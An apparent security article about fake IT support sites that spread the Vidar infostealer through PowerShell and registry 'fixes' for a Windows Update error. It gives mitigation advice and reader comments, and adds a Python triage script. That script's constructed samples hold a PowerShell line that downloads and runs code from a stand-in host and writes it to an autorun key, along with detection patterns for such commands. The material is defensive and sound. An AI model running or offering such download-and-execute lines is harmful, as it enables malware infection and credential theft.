Fake IT Support Website

Fake IT support websites have been set up to trick users into running harmful PowerShell scripts or importing malicious registry files. These scripts download Vidar, a type of information-stealing malware. The campaign is being promoted through compromised YouTube channels.

Detailed overview

Campaign overview

The malicious campaign centers around fake IT support websites that pose as legitimate solutions for resolving the Windows error code 0x80070643. This specific error code is commonly encountered during Windows updates, and users often seek online help to fix it. Cybercriminals have taken advantage of this by creating fraudulent websites that offer fake fixes. These sites direct users to execute PowerShell scripts or import registry files that are supposedly solutions to the error but are actually harmful.

Attack vector

The primary method of infection is through PowerShell scripts and registry files provided on these fraudulent websites. When users run these scripts or import these files, they unknowingly download Vidar malware. Vidar is an information stealer that can collect a wide range of data from infected systems, including credentials, financial information, and other sensitive data. This stolen data is then used for further malicious activities or sold on dark web markets.

Promotion and reach

The campaign is promoted through compromised YouTube channels, which host videos that appear to provide legitimate solutions to the Windows error code. These videos often include links to the fake IT support websites in their descriptions. The compromised channels lend an air of legitimacy to the scam, making it more likely that users will trust and follow the instructions provided.

Malware capabilities

Vidar malware, which is downloaded through these fake fixes, is a robust information stealer. It can harvest various types of data from infected systems, including:

  • Credentials: Vidar can extract login details saved in browsers and other applications.

  • Financial information: The malware can capture credit card details, online banking credentials, and other financial data.

  • Personal data: Other sensitive personal information stored on the system can also be targeted.

Once the data is harvested, it is sent to command-and-control (C2) servers controlled by the attackers. This data can then be used for further attacks, such as identity theft or financial fraud, or sold in bulk on dark web marketplaces.

Mitigation and prevention

To mitigate the risk posed by this campaign, users are advised to:

  • Verify sources: Always verify the authenticity of IT support websites and YouTube channels before following their advice.

  • Avoid running unknown scripts: Do not run PowerShell scripts or import registry files from untrusted sources.

  • Use security software: Employ robust cybersecurity software that can detect and block malicious activities.

  • Stay updated: Keep your system and software updated to protect against known vulnerabilities.

Cybersecurity professionals also recommend educating users about the dangers of following advice from unverified sources and encouraging them to seek help from official or well-known support channels.
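The attack vector section above describes "fixes" delivered as PowerShell one-liners and .reg files, and the mitigation list tells users not to run unknown ones. As an added example (not code from the article or from ConnectWise), the Python script below is the kind of triage check a help desk or SOC can run over such a file before anyone applies it: it flags .reg files that write to autorun keys or launch an interpreter, and PowerShell text that downloads and runs code from the internet. The key fragments, regular expressions and function names are assumptions chosen for illustration, and the sample .reg content and script lines are constructed, not real campaign artefacts.

```python
"""Triage a proposed 'fix' before it is applied: scan a .reg file and
PowerShell script text for traits a defender would want to catch.

Added example, not code from the original article or from ConnectWise.
Key fragments, patterns and samples below are assumptions/constructed.
"""
import re

# Registry paths that start a program at logon. A fix for a Windows Update
# error has no reason to write here (assumption: these fragments suffice).
AUTORUN_KEY_FRAGMENTS = (
    r"\CurrentVersion\Run",   # also covers RunOnce
    r"\Winlogon\Shell",
)

# Values that hand execution to a script interpreter or living-off-the-land binary.
INTERPRETER_RE = re.compile(r"powershell|pwsh|cmd\.exe|mshta|rundll32|wscript", re.I)

# Traits of a PowerShell "fix" that fetches and runs code from the internet.
SCRIPT_TRAITS = {
    "remote download": re.compile(
        r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Start-BitsTransfer", re.I),
    "in-memory execution": re.compile(r"Invoke-Expression|\biex\b", re.I),
    "encoded payload": re.compile(r"-enc(odedcommand)?\b|FromBase64String", re.I),
    "defence tampering": re.compile(r"Set-MpPreference|Add-MpPreference", re.I),
}


def scan_reg_file(text: str) -> list[str]:
    """Return one finding per autorun key written and per value that launches an interpreter."""
    findings = []
    current_key = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current_key = line[1:-1].lstrip("-")  # "[-HKEY...]" deletes a key; treat alike
            if any(frag.lower() in current_key.lower() for frag in AUTORUN_KEY_FRAGMENTS):
                findings.append(f"autorun key written: {current_key}")
        elif current_key and "=" in line:
            name, _, value = line.partition("=")
            name = name.strip('"')
            if INTERPRETER_RE.search(value):
                findings.append(f"{current_key}\\{name} launches an interpreter: {value}")
    return findings


def scan_script(script: str) -> list[str]:
    """Return the trait labels present in a PowerShell command line or script block."""
    return [label for label, pattern in SCRIPT_TRAITS.items() if pattern.search(script)]


def verdict(findings: list[str]) -> str:
    """Turn a findings list into the action a help desk should take."""
    return "block and investigate" if findings else "no indicators found"


# --- constructed samples (not real campaign artefacts) ---
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"UpdateFix"="powershell.exe -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://fix.example.invalid/a.ps1')\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableWindowsUpdateAccess"=dword:00000000
"""

SUSPICIOUS_SCRIPT = (
    "powershell -w hidden -c \"iex (New-Object Net.WebClient)"
    ".DownloadString('http://fix.example.invalid/a.ps1')\""
)
BENIGN_SCRIPT = "Stop-Service wuauserv; sfc /scannow; Start-Service wuauserv"

if __name__ == "__main__":
    for finding in scan_reg_file(SAMPLE_REG):
        print("reg:", finding)
    traits = scan_script(SUSPICIOUS_SCRIPT)
    print("script:", traits, "->", verdict(traits))
    print("benign:", scan_script(BENIGN_SCRIPT), "->", verdict(scan_script(BENIGN_SCRIPT)))
```

The benign sample (stopping the update service, running sfc, restarting it) produces no findings, while the constructed .reg file is flagged twice, once for the Run key and once for the PowerShell value under it. Pattern matching of this kind is a first-pass filter only; a clean result means no known trait was seen, not that the file is safe.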

Conclusion

This campaign is a stark reminder of the lengths cybercriminals will go to exploit common issues faced by users. By preying on those seeking help with a persistent Windows error, they have created a convincing yet dangerous trap. Users must exercise caution and skepticism when seeking online solutions, especially for technical issues. Staying informed and vigilant is key to protecting oneself from such deceptive attacks.

P Joshi

Freelance at none

7 months

The latest form of this hack has been automated and made so sophisticated that it's virtually impossible to do triangulation.

Vinay Gupta

Senior Security Analyst

7 months

Thanks for this informational article. Just to add some more on Vidar malware for the viewers, in the latest version of the malware (version 56.1) the gathered data is encoded prior to exfiltration, a change from the previous variants that have been known to send the compressed file data in plaintext format.
